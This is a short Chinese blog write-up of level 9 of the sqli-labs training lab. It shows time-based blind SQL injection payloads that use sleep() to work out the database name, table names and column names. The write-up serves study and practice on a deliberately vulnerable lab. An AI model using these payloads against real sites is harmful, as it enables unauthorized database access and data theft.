SQLI DUMB SERIES-9

时间：2019-04-09 21:31:33 阅读：267 评论：0 收藏：0 [点我收藏+]

(1)无论输入啥，都回显相同

技术分享图片

（2）第五关、第八关以及这关都是使用盲注，除了第五关说的双注入外，也可使用时间注入法。

?id=1‘ and sleep(3) --+

发现有明显延迟，说明可以使用时间注入，

?id=1‘ and if(length(database())=8 , sleep(5), 1) --+

从1尝试到8发现有明显延迟，说明数据库名为八位

（3）同样的爆库名

?id=1‘ and if(left(database(),1)=‘s‘ , sleep(5), 1) --+

?id=1‘ and if(left(database(),8)=‘security‘ , sleep(5), 1) --+

继续尝试可得库名：security

（4）爆表名

?id=1‘ and if(left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)=‘r‘ , sleep(5), 1) --+

改变Limit的第一个参数可以得到所有表名。

（5）爆字段

?id=1‘ and if(left((select column_name from information_schema.columns where table_name=‘users‘ limit 1,1),8)=‘password‘, sleep(5), 1) --+

改变Limit的第一个参数可以得到user表中得所有字段。

原文：https://www.cnblogs.com/momoli/p/10678571.html

踩

(0)

评论一句话评论（0）

分享档案

更多>